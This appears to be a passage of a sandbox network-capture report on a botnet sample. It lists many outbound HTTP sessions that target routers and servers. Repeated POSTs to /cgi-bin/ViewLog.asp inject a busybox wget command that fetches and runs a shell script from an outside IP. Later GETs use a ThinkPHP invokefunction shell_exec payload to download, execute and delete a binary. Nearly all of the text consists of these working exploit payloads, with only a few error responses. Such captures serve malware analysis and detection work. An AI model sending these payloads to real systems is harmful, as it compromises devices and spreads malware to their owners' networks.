                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:21.642882109 CET10058OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:25.770296097 CET10615OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:33.705296040 CET11527OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:49.575181961 CET13508OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:21.571039915 CET17553OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              483192.168.2.233742494.120.252.1178080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:18.687956095 CET9788OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              484192.168.2.234423262.29.87.2068080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:18.688003063 CET9788OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              485192.168.2.234290295.86.70.1918080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:18.808984041 CET9790OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              486192.168.2.234438885.163.16.1928080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:19.369628906 CET9809OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              487192.168.2.235956231.136.55.208080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:19.369874001 CET9809OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:20.363107920 CET9927OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:22.346894026 CET10179OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:26.538378954 CET10632OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:34.473140001 CET11649OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:50.347158909 CET13628OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:23.618725061 CET17804OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              488192.168.2.235942431.136.90.1788080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:19.370949030 CET9810OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:20.363075972 CET9926OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:22.378843069 CET10180OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:26.538378954 CET10632OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:34.733104944 CET11726OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:50.855020046 CET13752OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:23.618680000 CET17803OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              489192.168.2.235258695.183.66.158080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:19.377630949 CET9811OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:19.713433981 CET9885INHTTP/1.1 404 Not Found
                                                              Server: nginx/1.14.0
                                                              Date: Mon, 13 Nov 2023 21:19:19 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 169
                                                              Connection: keep-alive
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              49192.168.2.233351894.255.202.318080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:16.645204067 CET2101OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:16.968812943 CET2189INHTTP/1.0 403 Access denied
                                                              Server: tinyproxy/1.8.2
                                                              Content-Type: text/html
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              490192.168.2.234456294.120.239.2018080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:19.393965960 CET9812OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              491192.168.2.2360434112.161.209.3380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:20.980025053 CET10032OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:22.602694988 CET10183OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:24.522469044 CET10418OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:28.329929113 CET10885OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:36.008928061 CET11873OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:51.366946936 CET13781OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:23.618683100 CET17803OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              492192.168.2.2355298112.126.143.13280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:20.980072975 CET10033OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:21.295273066 CET10051INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
